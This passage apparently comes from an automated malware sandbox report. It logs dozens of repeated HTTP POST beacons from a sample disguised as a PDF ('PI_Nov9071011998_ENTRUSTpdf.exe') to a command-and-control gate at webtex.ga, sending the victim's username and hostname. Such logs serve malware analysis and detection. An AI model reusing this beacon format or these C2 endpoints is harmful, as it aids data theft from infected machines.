                                    Dec 3, 2020 10:03:10.357724905 CET938INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:05:27 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    113192.168.2.34984447.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:03:10.678498983 CET949OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:03:10.697562933 CET949OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:03:10.771740913 CET949INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:05:27 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    114192.168.2.34984547.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:03:11.071450949 CET1144OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:03:11.090671062 CET1144OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:03:11.214334011 CET1145INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:05:28 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    115192.168.2.34984647.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:03:11.553112030 CET1146OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:03:11.569849014 CET1146OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:03:11.615847111 CET1146INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:05:28 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    116192.168.2.34984847.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:03:11.821232080 CET1196OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:03:11.840156078 CET1197OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:03:11.875973940 CET1197INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:05:29 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    117192.168.2.34985047.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:03:12.190367937 CET1225OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:03:12.206964970 CET1225OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:03:12.249257088 CET1237INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:05:29 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    118192.168.2.34985147.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:03:12.493743896 CET1238OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:03:12.512500048 CET1238OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:03:12.555351019 CET1239INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:05:29 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    119192.168.2.34985247.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:03:12.862106085 CET1240OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:03:12.878895044 CET1240OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:03:12.924524069 CET1240INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:05:30 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    12192.168.2.34972147.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:02:33.392092943 CET81OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:02:33.408750057 CET81OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:02:33.455180883 CET81INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:04:50 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    120192.168.2.34985347.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:03:13.235860109 CET1241OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:03:13.252685070 CET1241OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:03:13.303884983 CET1241INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:05:30 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    121192.168.2.34985447.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:03:13.990149021 CET1242OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:03:14.006794930 CET1243OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:03:14.050435066 CET1243INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:05:31 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    122192.168.2.34985547.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:03:15.823745012 CET1244OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:03:15.840392113 CET1244OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:03:15.885561943 CET1244INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:05:33 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    123192.168.2.34985647.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:03:16.269413948 CET1245OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:03:16.286075115 CET1245OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:03:16.327589989 CET1246INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:05:33 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    124192.168.2.34985747.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:03:16.708488941 CET1246OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:03:16.725106001 CET1247OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:03:16.789518118 CET1247INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:05:34 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    125192.168.2.34985847.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:03:17.123306036 CET1248OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:03:17.143636942 CET1248OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:03:17.185949087 CET1248INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:05:34 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    126192.168.2.34985947.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:03:17.598131895 CET1287OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:03:17.614881992 CET1288OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:03:17.878546000 CET1288INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:05:34 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    127192.168.2.34986047.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:03:18.277932882 CET1289OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:03:18.297188997 CET1289OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:03:18.340692997 CET1289INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:05:35 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    128192.168.2.34986147.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:03:19.025661945 CET1290OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:03:19.042308092 CET1290OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:03:19.166356087 CET1291INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:05:36 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    129192.168.2.34986247.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:03:19.368860006 CET1292OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:03:19.387132883 CET1292OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:03:19.428898096 CET1292INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:05:36 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    13192.168.2.34972247.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:02:33.703087091 CET82OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:02:33.719687939 CET82OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:02:33.764564991 CET83INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:04:51 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    130192.168.2.34986447.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
